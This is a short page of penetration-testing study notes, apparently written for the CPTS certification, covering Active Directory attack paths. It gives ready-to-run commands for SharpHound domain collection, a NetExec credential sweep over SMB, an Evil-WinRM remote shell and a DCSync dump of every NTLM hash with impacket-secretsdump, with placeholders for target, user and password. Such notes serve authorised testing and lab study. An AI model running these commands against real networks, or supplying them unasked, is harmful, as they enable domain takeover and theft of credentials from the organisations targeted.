ZeroBox

Active Directory Attack Paths & Domain Enumeration

Domain mapping and attack path analysis using SharpHound, BloodHound, NetExec, and Impacket secretsdump.

bloodhoundsharphoundpowerviewnetexecimpacket

Active Directory environments rely on complex trust relationships, ACL permissions, and Kerberos delegation.

1. BloodHound / SharpHound Telemetry

Collect all domain objects, groups, sessions, and ACLs:

.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zip

2. NetExec (CrackMapExec) Domain Sweep

Verify credentials and locate administrative access across subnets:

nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares

3. Remote PowerShell with Evil-WinRM

evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts

4. DCSync Credential Extraction

Dump all NTLM password hashes directly over RPC:

impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlm

Combine domain enumeration with 07. Kerberos Exploitation: AS-REP & Kerberoasting and 08. Active Directory Certificate Services (AD CS) Abuse.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox